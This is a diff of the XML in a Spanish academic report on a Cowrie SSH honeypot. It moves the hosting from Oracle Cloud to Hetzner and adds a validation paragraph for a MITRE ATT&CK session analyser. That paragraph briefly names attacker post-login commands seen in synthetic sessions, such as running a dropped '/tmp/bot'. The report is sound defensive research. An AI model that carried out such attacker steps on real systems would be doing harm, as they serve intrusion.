+        <w:t xml:space="preserve">Los 33 casos se clasificaron correctamente. A continuación se ejecutó el analizador completo sobre las 500 sesiones simuladas: identificó 15 técnicas pertenecientes a 8 tácticas, y solo tres comandos quedaron sin técnica propia (cd /tmp, crontab -l y la ejecución directa de /tmp/bot), que efectivamente no corresponden a ninguna técnica distinta de la ejecución en shell. La Figura 4 muestra la gráfica generada. Debe interpretarse solo como validación del funcionamiento, ya que los datos son sintéticos; los resultados reales se presentarán en el informe de inteligencia.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura 4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK en los datos simulados (sesiones por técnica)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="4762500" cy="3305175"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="6" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4762500" cy="3305175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Prueba de la Herramienta de Aprovisionamiento</w:t>
       </w:r>
     </w:p>
@@ -20893,7 +23017,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 9. Pruebas del script de aprovisionamiento.</w:t>
+        <w:t xml:space="preserve">Tabla 10. Pruebas del script de aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -581,6 +581,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -662,6 +663,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -693,7 +695,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Este proyecto aborda el despliegue y análisis de un honeypot SSH de media interacción basado en Cowrie, expuesto a Internet desde una instancia gratuita de Oracle Cloud. El sistema simula un servidor Linux vulnerable para atraer ataques automatizados —principalmente intentos de fuerza bruta, ejecución de comandos y descarga de malware— con el objetivo de estudiar las tácticas, técnicas y procedimientos (TTPs) empleados por los atacantes. Los datos capturados durante un período mínimo de tres semanas se procesan mediante un script Python desarrollado ad hoc que genera rankings de IPs atacantes con geolocalización, credenciales más utilizadas, comandos ejecutados y ficheros descargados. Los hallazgos se clasifican según el marco MITRE ATT&amp;CK y se acompañan de recomendaciones defensivas aplicables a entornos reales. Opcionalmente, los logs se ingestan en Wazuh (SIEM) para su visualización en dashboard. El proyecto demuestra cómo un honeypot de bajo coste proporciona inteligencia de amenazas accionable con herramientas exclusivamente de software libre.</w:t>
+        <w:t xml:space="preserve">Este proyecto aborda el despliegue y análisis de un honeypot SSH de media interacción basado en Cowrie, expuesto a Internet desde un servidor cloud de Hetzner. El sistema simula un servidor Linux vulnerable para atraer ataques automatizados —principalmente intentos de fuerza bruta, ejecución de comandos y descarga de malware— con el objetivo de estudiar las tácticas, técnicas y procedimientos (TTPs) empleados por los atacantes. Los datos capturados durante un período mínimo de tres semanas se procesan mediante un script Python desarrollado ad hoc que genera rankings de IPs atacantes con geolocalización, credenciales más utilizadas, comandos ejecutados y ficheros descargados. Los hallazgos se clasifican según el marco MITRE ATT&amp;CK y se acompañan de recomendaciones defensivas aplicables a entornos reales. Opcionalmente, los logs se ingestan en Wazuh (SIEM) para su visualización en dashboard. El proyecto demuestra cómo un honeypot de bajo coste proporciona inteligencia de amenazas accionable con herramientas exclusivamente de software libre.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -730,7 +732,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">honeypot, SSH, Cowrie, inteligencia de amenazas, MITRE ATT&amp;CK, ciberseguridad, fuerza bruta, malware, SIEM, Oracle Cloud</w:t>
+        <w:t xml:space="preserve">honeypot, SSH, Cowrie, inteligencia de amenazas, MITRE ATT&amp;CK, ciberseguridad, fuerza bruta, malware, SIEM, cloud</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -762,6 +764,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
       </w:pPr>
@@ -792,7 +795,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">This project covers the deployment and analysis of a medium-interaction SSH honeypot based on Cowrie, exposed to the Internet from an Oracle Cloud free-tier instance. The system simulates a vulnerable Linux server to attract automated attacks —primarily brute-force login attempts, command execution, and malware downloads— with the goal of studying the tactics, techniques, and procedures (TTPs) used by attackers. Data captured over a minimum three-week period is processed by a purpose-built Python script that generates attacker IP rankings with geolocation, most-used credentials, executed commands, and downloaded files. Findings are mapped to the MITRE ATT&amp;CK framework and accompanied by defensive recommendations applicable to production environments. Optionally, logs are ingested into Wazuh (SIEM) for dashboard visualization. The project demonstrates how a low-cost honeypot provides actionable threat intelligence using exclusively open-source tools.</w:t>
+        <w:t xml:space="preserve">This project covers the deployment and analysis of a medium-interaction SSH honeypot based on Cowrie, exposed to the Internet from a Hetzner Cloud server. The system simulates a vulnerable Linux server to attract automated attacks —primarily brute-force login attempts, command execution, and malware downloads— with the goal of studying the tactics, techniques, and procedures (TTPs) used by attackers. Data captured over a minimum three-week period is processed by a purpose-built Python script that generates attacker IP rankings with geolocation, most-used credentials, executed commands, and downloaded files. Findings are mapped to the MITRE ATT&amp;CK framework and accompanied by defensive recommendations applicable to production environments. Optionally, logs are ingested into Wazuh (SIEM) for dashboard visualization. The project demonstrates how a low-cost honeypot provides actionable threat intelligence using exclusively open-source tools.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -829,12 +832,13 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">honeypot, SSH, Cowrie, threat intelligence, MITRE ATT&amp;CK, cybersecurity, brute force, malware, SIEM, Oracle Cloud</w:t>
+        <w:t xml:space="preserve">honeypot, SSH, Cowrie, threat intelligence, MITRE ATT&amp;CK, cybersecurity, brute force, malware, SIEM, cloud</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -853,6 +857,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -946,6 +951,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -1120,6 +1126,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -1842,7 +1849,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Adecuación OCI Free</w:t>
+              <w:t xml:space="preserve">Adecuación a servidor pequeño</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1979,7 +1986,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cowrie ofrece la mejor relación entre profundidad de captura, facilidad de instalación y requisitos hardware. Esto lo hace especialmente adecuado para un proyecto académico con infraestructura gratuita (Oracle Cloud Always Free), donde los recursos son limitados a 1 OCPU y 6 GB de RAM. Kippo, su predecesor, está abandonado y no recibe actualizaciones de seguridad. Honeyd solo ofrece baja interacción, insuficiente para observar el comportamiento post-autenticación. T-Pot integra múltiples honeypots pero requiere 8 GB de RAM como mínimo, lo que lo hace inviable en el tier gratuito.</w:t>
+        <w:t xml:space="preserve">Cowrie ofrece la mejor relación entre profundidad de captura, facilidad de instalación y requisitos hardware. Esto lo hace especialmente adecuado para un proyecto académico desplegado en un servidor cloud pequeño, con pocos núcleos y unos pocos GB de RAM. Kippo, su predecesor, está abandonado y no recibe actualizaciones de seguridad. Honeyd solo ofrece baja interacción, insuficiente para observar el comportamiento post-autenticación. T-Pot integra múltiples honeypots pero requiere 8 GB de RAM como mínimo, lo que lo hace inviable en un servidor de ese tamaño.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2004,6 +2011,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -2079,6 +2087,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -2229,6 +2238,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -2265,6 +2275,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -2297,7 +2308,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Servidor cloud con al menos 1 vCPU y 1 GB de RAM (en este proyecto se utiliza la instancia A1.Flex de Oracle Cloud con 1 OCPU ARM y 6 GB de RAM).</w:t>
+        <w:t xml:space="preserve">Servidor cloud con al menos 1 vCPU y 1 GB de RAM (en este proyecto se utiliza un servidor CX23 de Hetzner Cloud con 2 vCPU x86 y 4 GB de RAM).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2341,6 +2352,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -2373,7 +2385,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cuenta de Oracle Cloud con acceso al tier Always Free (instancia A1.Flex, ARM).</w:t>
+        <w:t xml:space="preserve">Cuenta en un proveedor cloud con servidores Linux e IP pública (en este proyecto, Hetzner Cloud).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2430,7 +2442,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cowrie (última versión estable desde el repositorio oficial de GitHub).</w:t>
+        <w:t xml:space="preserve">Cowrie 3.1.0, instalado desde PyPI.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2531,6 +2543,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -2582,7 +2595,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Puertos 22 (honeypot) y 2022 (SSH real) accesibles desde Internet a través de las security lists de OCI.</w:t>
+        <w:t xml:space="preserve">Puertos 22 (honeypot) y 2022 (SSH real) accesibles desde Internet a través del firewall del proveedor (Cloud Firewall de Hetzner).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2626,6 +2639,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -2904,7 +2918,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Provisionar servidor en Oracle Cloud</w:t>
+              <w:t xml:space="preserve">Provisionar servidor en Hetzner Cloud</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2990,7 +3004,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Crear cuenta Oracle Cloud y configurar compartment</w:t>
+              <w:t xml:space="preserve">Crear cuenta y proyecto en Hetzner Cloud con clave SSH dedicada</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3076,7 +3090,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Verificar acceso a consola OCI y compartment visible</w:t>
+              <w:t xml:space="preserve">Acceso a la consola con 2FA y clave SSH registrada</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3162,7 +3176,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Crear VCN con subnet pública y security lists</w:t>
+              <w:t xml:space="preserve">Crear el Cloud Firewall (entrada solo TCP 22, TCP 2022 e ICMP)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3248,7 +3262,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Ping externo a la IP pública de la subnet</w:t>
+              <w:t xml:space="preserve">Ping externo a la IP pública del servidor</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3334,7 +3348,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Desplegar instancia A1.Flex (ARM, Ubuntu 24.04)</w:t>
+              <w:t xml:space="preserve">Desplegar servidor CX23 (x86, Ubuntu 24.04, Núremberg)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3420,7 +3434,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Conexión SSH a la instancia desde terminal local</w:t>
+              <w:t xml:space="preserve">Conexión SSH al servidor desde terminal local</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9085,6 +9099,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -9103,6 +9118,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -9183,15 +9199,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Zona Oracle Cloud: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">el servidor Ubuntu 24.04 (A1.Flex, 1 OCPU, 6 GB RAM) ejecuta iptables como firewall del host y para la redirección NAT del puerto 22 al 2222, Cowrie como honeypot y OpenSSH en el puerto 2022 para administración real.</w:t>
+        <w:t xml:space="preserve">Zona Hetzner Cloud: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">el servidor Ubuntu 24.04 (CX23, 2 vCPU x86, 4 GB RAM, en Núremberg) ejecuta iptables como firewall del host y para la redirección NAT del puerto 22 al 2222, Cowrie como honeypot y OpenSSH en el puerto 2022 para administración real.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9330,6 +9346,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -9417,7 +9434,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">La Security List de OCI admite el tráfico al puerto 22. Ya en el servidor, la regla NAT PREROUTING de iptables redirige la conexión al puerto 2222, donde escucha Cowrie.</w:t>
+        <w:t xml:space="preserve">El Cloud Firewall de Hetzner admite el tráfico al puerto 22. Ya en el servidor, la regla NAT PREROUTING de iptables redirige la conexión al puerto 2222, donde escucha Cowrie.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9518,6 +9535,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -9569,15 +9587,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Nivel 1 — Infraestructura cloud (Security Lists): </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">las reglas de la subnet pública de OCI permiten exclusivamente el tráfico TCP entrante a los puertos 22 y 2022. Cualquier otro puerto está cerrado a nivel de red antes de llegar a la instancia.</w:t>
+        <w:t xml:space="preserve">Nivel 1 — Infraestructura cloud (Cloud Firewall): </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">el Cloud Firewall de Hetzner (honeypot-fw) permite exclusivamente el tráfico entrante TCP a los puertos 22 y 2022 e ICMP. Cualquier otro puerto se bloquea en la infraestructura del proveedor, antes de llegar al servidor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9660,6 +9678,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -10723,6 +10742,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
@@ -10741,6 +10761,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -10777,6 +10798,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -10902,6 +10924,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -10915,7 +10938,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Zona DMZ Cloud (Oracle Cloud)</w:t>
+        <w:t xml:space="preserve">Zona DMZ Cloud (Hetzner Cloud)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10955,15 +10978,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Security Lists de OCI: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">reglas de firewall a nivel de la infraestructura cloud que permiten únicamente el tráfico entrante a los puertos 22 y 2022. Todo el demás tráfico se descarta antes de llegar a la instancia.</w:t>
+        <w:t xml:space="preserve">Cloud Firewall de Hetzner: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">reglas de firewall a nivel de la infraestructura cloud que permiten únicamente el tráfico entrante TCP a los puertos 22 y 2022 e ICMP. Todo el demás tráfico se descarta antes de llegar al servidor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10992,7 +11015,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">segunda capa de filtrado en el sistema operativo que rechaza todo lo no autorizado, proporcionando defensa en profundidad. En caso de error en las security lists, iptables actúa como respaldo.</w:t>
+        <w:t xml:space="preserve">segunda capa de filtrado en el sistema operativo que rechaza todo lo no autorizado, proporcionando defensa en profundidad. En caso de error en el Cloud Firewall, iptables actúa como respaldo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11027,6 +11050,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11065,6 +11089,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11101,6 +11126,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11284,6 +11310,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11322,6 +11349,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11360,6 +11388,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11396,6 +11425,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11590,6 +11620,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11628,6 +11659,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11666,6 +11698,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -11720,7 +11753,7 @@
       <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="5038725" cy="3257550"/>
+            <wp:extent cx="5038725" cy="3162300"/>
             <wp:effectExtent t="0" r="0" b="0" l="0"/>
             <wp:docPr id="4" name="" descr="" title=""/>
             <wp:cNvGraphicFramePr>
@@ -11745,7 +11778,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5038725" cy="3257550"/>
+                      <a:ext cx="5038725" cy="3162300"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -11816,7 +11849,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">IP pública asignada por OCI. La VCN usa el rango 10.0.0.0/16 y la subnet pública el 10.0.0.0/24, valores por defecto del asistente de creación de OCI. La instancia se conecta a la VCN mediante una VNIC (Virtual Network Interface Card) con IP privada en la subnet pública.</w:t>
+        <w:t xml:space="preserve">Hetzner asigna la IP pública directamente a la interfaz eth0 del servidor, sin red privada ni traducción de direcciones intermedia. Solo se ha habilitado IPv4: el servidor se creó sin IPv6 porque los scripts de bastionado configuran únicamente el filtrado IPv4.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11837,15 +11870,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Internet Gateway: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">componente de OCI que proporciona la conectividad entre la VCN y la Internet pública. Es el punto donde se aplican las security lists.</w:t>
+        <w:t xml:space="preserve">Cloud Firewall: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cortafuegos gestionado por Hetzner que se aplica al tráfico antes de que llegue al servidor. Es la primera de las dos capas de filtrado del diseño.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11880,6 +11913,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
         <w:pageBreakBefore/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="center"/>
